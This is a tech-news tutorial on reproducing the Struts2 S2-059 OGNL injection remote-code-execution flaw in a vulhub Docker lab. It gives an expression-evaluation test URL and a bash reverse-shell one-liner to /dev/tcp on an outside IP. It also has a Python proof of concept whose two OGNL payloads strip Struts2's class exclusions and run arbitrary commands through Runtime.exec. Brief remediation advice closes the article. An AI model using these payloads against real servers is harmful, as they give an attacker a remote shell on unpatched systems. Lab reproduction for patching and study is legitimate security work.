2025-01-23 Update From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
Today I will talk about reproducing the Struts2 S2-059 remote code execution vulnerability. Many people may not know much about it, so to help you understand it better, the editor has summarized the following content. I hope you get something out of this article.
0x00 Introduction
Struts2 is a powerful open-source Java web framework from the Apache Software Foundation; at its core it is a servlet. It follows the MVC architecture and has a clear structure. It is usually used as the controller (Controller) that establishes the data interaction between the model and the view, and it is used to build enterprise-level Java web applications: it uses and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the design ideas of WebWork as its core, absorbs some advantages of the original Struts framework, and provides a cleaner web application framework for implementing the MVC design pattern.
0x01 Vulnerability overview
Struts2 evaluates the attribute value of a Struts2 tag as an OGNL expression. When that attribute value can be modified by external input, an attacker can supply a crafted OGNL expression through that input; the expression is then parsed and evaluated, resulting in remote code execution.
0x02 Affected versions
Struts 2.0.0 - Struts 2.5.20
0x03 Environment setup
1. The vulnerable environment is built quickly with vulhub. vulhub can be downloaded from:
https://github.com/vulhub/vulhub
cd vulhub-master/struts2/s2-059
2. Build the target environment quickly with docker-compose:
docker-compose up -d
3. After startup, visit http://ip:8080/?id=1 in the browser to see the test page.
0x04 Vulnerability reproduction
1. When the browser requests http://ip:8080/?id=%25{88*88}, the expression 88*88 is evaluated and its result is displayed: the attribute value of the Struts2 tag has been executed as an OGNL expression, so the OGNL expression is parsed.
2. Use the PoC to obtain a reverse shell. The reverse-shell payload must be base64-encoded.
bash -i >& /dev/tcp/172.16.1.132/9967 0>&1
Base64 encoding URL:
http://www.jackson-t.ca/runtime-exec-payloads.html
import requests

url = "http://127.0.0.1:8080"

# First request: clear the OGNL excluded-class and excluded-package lists
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context)."
          "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
          "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
          "(#ognlUtil.setExcludedClasses(''))."
          "(#ognlUtil.setExcludedPackageNames(''))}"
}
# Second request: reset member access and run the command; replace the
# placeholder with the base64-encoded payload from the link above
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context)."
          "(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS))."
          "(@java.lang.Runtime@getRuntime().exec('payload-base64 encoding'))}"
}
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
3. Replace the payload in the PoC with your own payload and run it with Python; the reverse shell connects back.
0x05 Remediation
1. Upgrade to Struts 2.5.22 or later.
2. Enable OGNL expression injection protection:
https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable
After reading the above, do you have a better understanding of reproducing the Struts2 S2-059 remote code execution vulnerability? If you want to learn more, please follow the industry information channel. Thank you for your support.
© 2024 shulou.com SLNews company. All rights reserved.